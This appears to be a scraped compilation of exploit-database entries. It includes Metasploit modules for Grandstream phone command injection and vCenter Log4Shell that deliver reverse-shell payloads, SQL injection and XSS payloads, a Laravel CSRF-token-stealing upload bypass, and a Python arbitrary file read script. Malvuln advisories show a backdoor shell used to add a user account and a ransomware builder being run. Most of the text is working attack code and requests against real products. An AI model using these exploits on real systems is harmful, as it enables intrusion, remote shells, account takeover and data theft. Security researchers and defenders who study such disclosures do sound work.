<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = GreatRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",<br /> 'Description' => %q{<br /> This module exploits a command injection vulnerability in Grandstream GXV3175<br /> IP multimedia phones. The 'settimezone' action does not validate input in the<br /> 'timezone' parameter allowing injection of arbitrary commands.<br /><br /> A buffer overflow in the 'phonecookie' cookie parsing allows authentication<br /> to be bypassed by providing an alphanumeric cookie 93 characters in length.<br /><br /> This module was tested successfully on Grandstream GXV3175v2<br /> hardware revision V2.6A with firmware version 1.0.1.19.<br /> },<br /> 'Author' => [<br /> 'alhazred', # Command injection vulnerability discovery and exploit<br /> 'Brendan Scarvell', # Auth bypass discovery<br /> 'bcoles' # Metasploit<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'linux',<br /> 'References' => [<br /> [ 'CVE', '2019-10655' ],<br /> [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],<br /> [ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> },<br /> 'DisclosureDate' => '2016-09-01',<br /> 'Privileged' => true,<br /> 'Arch' => ARCH_ARMLE,<br /> 'DefaultOptions' => {<br /> 'PrependFork' => true,<br /> 'MeterpreterTryToFork' => true,<br /> 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',<br /> 'CMDSTAGER::FLAVOR' => 'wget'<br /> },<br /> 'CmdStagerFlavor' => %w[wget],<br /> 'Targets' => [<br /> ['Automatic', {}]<br /> ],<br /> 'DefaultTarget' => 0<br /> )<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => '/manager',<br /> 'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",<br /> 'vars_get' => {<br /> 'action' => 'settimezone',<br /> 'timezone' => ''<br /> }<br /> )<br /><br /> if res && res.code == 200 && res.body.to_s.include?('Response=Success')<br /> return CheckCode::Detected('phonecookie authentication bypassed successfully.')<br /> end<br /><br /> CheckCode::Safe<br /> end<br /><br /> def execute_command(cmd, _opts)<br /> res = send_request_cgi(<br /> 'uri' => '/manager',<br /> 'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",<br /> 'vars_get' => {<br /> 'action' => 'settimezone',<br /> 'timezone' => "`#{cmd}`"<br /> }<br /> )<br /> unless res<br /> fail_with(Failure::Unreachable, 'Connection failed')<br /> end<br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")<br /> end<br /> unless res.body.to_s.include?('Response=Success')<br /> fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")<br /> end<br /> end<br /><br /> def exploit<br /> execute_cmdstager(<br /> linemax: 220, # 255 minus URL encoding<br /> background: true<br /> )<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)<br /># Google Dork: intitle: "Inicio de Sesión - Kmaleon"<br /># Date: 2021-11-05<br /># Exploit Author: Amel BOUZIANE-LEBLOND<br /># Vendor Homepage: https://www.levelprograms.com<br /># Software Link: https://www.levelprograms.com/kmaleon-abogados/<br /># Version: v1.1.0.205<br /># Tested on: Linux<br /><br /># Description:<br /># The Kmaleon application from levelprogram is vulnerable to<br /># SQL injection via the 'tipocomb' parameter on the kmaleonW.php<br /><br />==================== 1. SQLi ====================<br /><br />http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true<br /><br />The 'tipocomb' parameter is vulnerable to SQL injection.<br /><br />GET parameter 'tipocomb' is vulnerable.<br /><br />---<br />Parameter: #1* (URI)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)<br /> Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true<br />---<br />[INFO] the back-end DBMS is MySQL<br />back-end DBMS: MySQL >= 5.0.0<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::JndiInjection<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::CheckModule<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(_info = {})<br /> super(<br /> 'Name' => 'VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)',<br /> 'Description' => %q{<br /> VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can sent to the server<br /> that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS<br /> command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on<br /> Windows.<br /><br /> This module will start an LDAP server that the target will need to connect to. This exploit uses the logon page<br /> vector.<br /> },<br /> 'Author' => [<br /> 'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff<br /> 'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff<br /> 'jbaines-r7', # vCenter research<br /> 'w3bd3vil' # vCenter PoC https://twitter.com/w3bd3vil/status/1469814463414951937<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-44228' ],<br /> [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],<br /> [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0028.html' ],<br /> [ 'URL', 'https://twitter.com/w3bd3vil/status/1469814463414951937' ]<br /> ],<br /> 'DisclosureDate' => '2021-12-09',<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'SRVPORT' => 389,<br /> 'WfsDelay' => 30,<br /> 'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'<br /> },<br /> 'Targets' => [<br /> [<br /> 'Windows', {<br /> 'Platform' => 'win'<br /> },<br /> ],<br /> [<br /> 'Linux', {<br /> 'Platform' => 'unix',<br /> 'Arch' => [ARCH_CMD],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> },<br /> ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [IOC_IN_LOGS],<br /> 'AKA' => ['Log4Shell', 'LogJam'],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'RelatedModules' => [<br /> 'auxiliary/scanner/http/log4shell_scanner',<br /> 'exploit/multi/http/log4shell_header_injection'<br /> ]<br /> }<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> validate_configuration!<br /><br /> return Exploit::CheckCode::Unknown if tenant.nil?<br /><br /> super<br /> end<br /><br /> def check_options<br /> {<br /> 'LDAP_TIMEOUT' => datastore['WfsDelay'],<br /> 'HTTP_HEADER' => 'X-Forwarded-For',<br /> 'TARGETURI' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',<br /> 'HEADERS_FILE' => nil,<br /> 'URIS_FILE' => nil<br /> }<br /> end<br /><br /> def build_ldap_search_response_payload<br /> return [] if @search_received<br /><br /> @search_received = true<br /><br /> print_good('Delivering the serialized Java object to execute the payload...')<br /> build_ldap_search_response_payload_inline('BeanFactory')<br /> end<br /><br /> def tenant<br /> return @tenant unless @tenant.nil?<br /><br /> res = send_request_cgi('uri' => normalize_uri(target_uri, 'ui', 'login'))<br /> return nil unless res&.code == 302<br /> return nil unless res.headers['Location'] =~ %r{websso/SAML2/SSO/([^/]+)\?}<br /><br /> @tenant = Regexp.last_match(1)<br /> end<br /><br /> def trigger<br /> @search_received = false<br /> # HTTP request initiator<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',<br /> 'headers' => { 'X-Forwarded-For' => jndi_string }<br /> )<br /> end<br /><br /> def exploit<br /> validate_configuration!<br /><br /> start_service<br /> trigger<br /><br /> sleep(datastore['WfsDelay'])<br /> handler<br /> ensure<br /> cleanup<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)<br /># Date: 20/08/2021<br /># Exploit Author: Davide Taraschi<br /># Vendor Homepage: https://wpschoolpress.com/<br /># Software Link: https://wpschoolpress.com/free-download/<br /># Version: up to 2.1.17 (non included)<br /># Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2<br /># CVE : CVE-2021-24664<br /><br /># Description:<br />The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues.<br />The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript.<br /><br /># PoC:<br />As admin,<br />- Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)//<br />The XSS will be triggered when adding another teacher attendance by clicking on the Add button<br /><br />- Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)//<br />The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button<br /><br />- Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)//<br />The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3)<br /><br />- Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)//<br />The XSS will be triggered when editing the Subject<br /><br />- Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)//<br />The XSS will be triggered when editing the Exam=20<br /><br />Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/5dfa998f62612e10d5d28d26948dd50f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransomware Builder Babuk<br />Vulnerability: Insecure Permissions<br />Description: The malware creates directorys with insecure permissions when write to c:\ drive, granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 5dfa998f62612e10d5d28d26948dd50f<br />Vuln ID: MVID-2022-0461<br />Disclosure: 01/19/2022<br /><br /><br />Exploit/PoC:<br />C:\>builder.exe<br />Usage: builder.exe FolderName<br /><br />C:\>builder.exe c:\hate<br />Creating folder 'c:\hate'<br />curve25519 keys generated.<br />"c:\hate\e_win.exe" written!<br />"c:\hate\d_win.exe" written!<br />"c:\hate\e_esxi.out" written!<br />"c:\hate\d_esxi.out" written!<br />"c:\hate\e_nas_x86.out" written!<br />"c:\hate\d_nas_x86.out" written!<br />"c:\hate\e_nas_arm.out" written!<br />"c:\hate\d_nas_arm.out" written!<br />"c:\hate\kp.curve25519" written!<br />"c:\hate\ks.curve25519" written!<br />Press any key to continue . . .<br /><br />C:\>cacls \hate<br />C:\hate BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre style="position: relative;">
<code># Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux
# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
# Steps to reproduce:
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
2- Use code below to bypass csrf token
ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
console.log(xhr.responseText);
}
}
//
xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}
function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
// true on the end of here makes the call asynchronous
//Edit the path as you want
xhr.open("GET", "/image-upload", true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementsByTagName("input")[0];
// Show the token
alert("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}
getTokenJS();
var POST_URL="/"
getTokenJS();
</script>
</html>
3- Save it as Html file and upload it.
</code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/57bda78cc5fd6a06017148bae28e8e39.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wisell<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP port 5277. Third-party attackers who can reach an infected system can run any OS commands further compromising the host. <br />Type: PE32<br />MD5: 57bda78cc5fd6a06017148bae28e8e39<br />Vuln ID: MVID-2022-0460<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 5277<br />WinShell v1.0 - '!' to quit, 'enter' to shell...<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\dump>net user HYP3RLINX 666 /add<br />net user HYP3RLINX 666 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC<br /># Date: 05/08/2021<br /># Exploit Author: Rizal Muhammed @ub3rsick<br /># Vendor Homepage: https://www.wipro.com/holmes/<br /># Version: 20.4.1<br /># Tested on: Windows 10 x64<br /># CVE : CVE-2021-38146<br /><br />import requests as rq<br />import argparse<br /><br />port = 8001 # change port if application is running on different port<br /><br />def file_download(host, filepath):<br /> vuln_url = "http://%s:%s/home/download" % (host, port)<br /> data = {<br /> "SearchString": filepath,<br /> "Msg": ""<br /> }<br /><br /> hdr = {<br /> "content-type": "application/json"<br /> }<br /><br /> resp = rq.post(vuln_url, headers=hdr, json=data)<br /><br /> print resp.text<br /><br />def main():<br /> parser = argparse.ArgumentParser(<br /> description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",<br /> epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"<br /> )<br /> parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)<br /> parser.add_argument("-f","--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")<br /> args = parser.parse_args()<br /><br /> if "\\" in args.file_path:<br /> fp = args.file_path.replace("\\", "/")<br /> else:<br /> fp = args.file_path<br /> file_download(args.target_ip, fp)<br /><br />if __name__ == "__main__":<br /> main()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CollectorStealerBuilder v2.0.0 Panel<br />Vulnerability: Man-in-the-Middle (MITM)<br />Description: MITM vector exists as the CURL request used when sending data to "api.telegram.org/bot" has CURLOPT_SSL_VERIFYPEER set to false. CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust was issued by a CA you trust and it's genuine.<br />Type: WebUI<br />MD5: 54530f88c8e4f4371c9418f00c256b1d<br />MD5: 8c003105229554557c75ec836b4fcf79 (collect.php)<br />Vuln ID: MVID-2022-0459<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />Vulnerable "collect.php" code snippet.<br /><br />$desc = "_________________________ \r\n\n🏴 IP: " . $ip . "\n🌐 Country: " . $country . "\n🏠 City: " . $city . "\n🔧 Build: ". $Build[1] . "\r\n_________________________ \n\n" . $desc; // Добавляем айпи и город<br />$url = "https://api.telegram.org/bot" . $token . "/sendDocument";<br />$document = new CURLFile(realpath($dest_path));<br />$ch = curl_init();<br />curl_setopt($ch, CURLOPT_URL, $url);<br />curl_setopt($ch, CURLOPT_POST, 1);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, ["chat_id" => $chat_id, "document" => $document, "caption" => $desc]);<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type:multipart/form-data"]);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />$out = curl_exec($ch);<br />curl_close($ch);<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass<br /># Exploit Author: Daniel Haro (Dirox)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html<br /># Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html<br /># Version: Simple Subscription Website 1.0<br /># Tested on: Windows, xampp<br /># CVE: CVE-2021-43140<br /><br />- Description:<br />SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -<br /><br />PoC:<br /><br />POST /plan_application/Actions.php?a=login HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 57<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/plan_application/admin/login.php<br />Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3<br /><br />username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-<br /><br /></code></pre>